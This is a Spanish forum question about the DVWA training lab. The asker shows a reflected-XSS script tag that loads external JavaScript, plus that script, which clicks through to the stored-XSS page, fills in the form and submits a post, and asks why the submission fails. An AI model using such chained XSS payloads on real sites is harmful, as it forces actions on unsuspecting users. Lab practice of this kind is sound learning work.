En DVWA estoy tratando de entender diferentes métodos de ataque que el escenario habitual alert('XSS');
.
Estoy utilizando XSS reflexivo para entregar una carga útil que luego hace que el usuario que sigue la URL envíe una publicación en la sección XSS almacenada en la misma aplicación web. Aquí está mi código JS externo
var pagech = document.getElementsByTagName('a')[11].click();
var name = document.getElementsByName("txtName")[0].value="helloworld";
var comment = document.getElementsByName("mtxMessage")[0].value="helloworld2";
var sub = document.getElementsByTagName('input')[1].click();
Este código básicamente cambia la página a la página xss almacenada e ingresa algunos valores, luego envía el formulario, funciona dentro de la consola de firebug pero no cuando lo ejecuto utilizando la vulnerabilidad xss reflectiva a continuación.
<script src="http://172.16.150.172/dvwa/hackable/uploads/XSS.js"></script>
En cambio, la página de usuarios cambia pero la publicación no se envía. ¿Cómo puedo solucionar esto si es posible?